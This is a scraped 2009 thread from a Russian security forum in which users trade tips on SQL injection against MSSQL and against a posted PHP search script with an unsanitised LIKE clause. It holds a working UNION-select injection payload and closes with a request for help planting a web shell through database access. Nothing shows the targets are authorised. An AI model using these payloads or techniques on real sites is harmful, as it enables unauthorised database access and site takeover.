ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.10.2009, 17:42
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022
Репутация:
259
|
|
попробуй в hex закодировать, в твоём случае users будет 0x7573657273
|
|
|
18.10.2009, 17:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Quiklys
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users') AND name IN NOT ('userid')
В ответ получаю:
надо писать не IN NOT
а NOT IN
2 min7 бред, это mssql
|
|
|
|
18.10.2009, 17:47
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Отписал в пм
min7, во-первых, users это имя таблицы, а не строка, во-вторых 0x... в MSSQL работать не будет (нужны дополнительные конструкции на T-SQL)
|
|
|
|
18.10.2009, 19:08
|
|
Новичок
Регистрация: 29.09.2009
Сообщений: 5
Провел на форуме:
22892
Репутация:
0
|
|
Огромное всем спасибо!
После того как загнал в char userid, он начал просто отображаться.
Conversion failed when converting the varchar value 'userid' to data type int.
Последний раз редактировалось Quiklys; 18.10.2009 в 19:18..
|
|
|
|
18.10.2009, 19:27
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Код:
$text=$_POST['text'];
$tr=$_POST['tr'];
$tr_text=$_POST['tr_text'];
if (empty($text)){echo"<div class=cont1>Введите ключевое слово!<br/></div><div class=menu><a href=\"search.php\">Назад</a></div>";
include "footer.php";
exit;}
if($tr_text==1){include_once "trans.php";
$text=eng_to_rus($text);}
//$text=strtolower($text);
if($tr==1){
$arr=mysql_query("select uid,site_name,link,info,cat from `users` where info like '%$text%' ;");
}
Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает 
Код:
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
|
|
|
|
18.10.2009, 20:21
|
|
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900
Репутация:
399
|
|
Сообщение от SeNaP
Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает
Код:
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
Ну просто в поле tr_text вводи 0 в tr вводим 1, а в text нашу скулю...
|
|
|
|
18.10.2009, 20:32
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Gray_Wolf
Ну просто в поле tr_text вводи 0 в tr вводим 1, а в text нашу скулю...
А как с LIKE быть?
Пытаюсь подставит ' не выводит ни какой ошибки, т.е. производится поиск ковычки в БД.
Пытался так
и т.д.
Чёт вообще мозг отказывается работать 
|
|
|
|
18.10.2009, 20:41
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
пости в $_POST['text'] - %
и про $_POST['tr'] не забудь так как без него запрос не выполнится.
|
|
|
|
18.10.2009, 21:01
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от SeNaP
Код:
$text=$_POST['text'];
$tr=$_POST['tr'];
$tr_text=$_POST['tr_text'];
if (empty($text)){echo"<div class=cont1>Введите ключевое слово!<br/></div><div class=menu><a href=\"search.php\">Назад</a></div>";
include "footer.php";
exit;}
if($tr_text==1){include_once "trans.php";
$text=eng_to_rus($text);}
//$text=strtolower($text);
if($tr==1){
$arr=mysql_query("select uid,site_name,link,info,cat from `users` where info like '%$text%' ;");
}
Возможно ли тут произвести SQL inj ?
Меня просто вот это смущает
Код:
select uid,site_name,link,info,cat from `users` where info like '%$text%' ;
.php?tr=1&text=%' and info = -1 union select 1,2,3,4,5--+
ЗЫ l1ght, я знаю что постом) есть плагины которые позволяют из строки браузера отправлять постом
Последний раз редактировалось .Slip; 18.10.2009 в 21:25..
|
|
|
|
18.10.2009, 21:53
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет, почти повторяюсь. Растолкую поточнее
Есть 2 сервера (2 разные машины)
1 с сайтом
2 с БД
Есть доступ к БД
А сайт использует эту БД
Задача залить шелл на сайт через БД
Если допустим в БД заношу <? eval(echo 1  ; ?> то на сайте так и выводит, не обрабатывая
На сайте знаю полный путь. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1607160){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
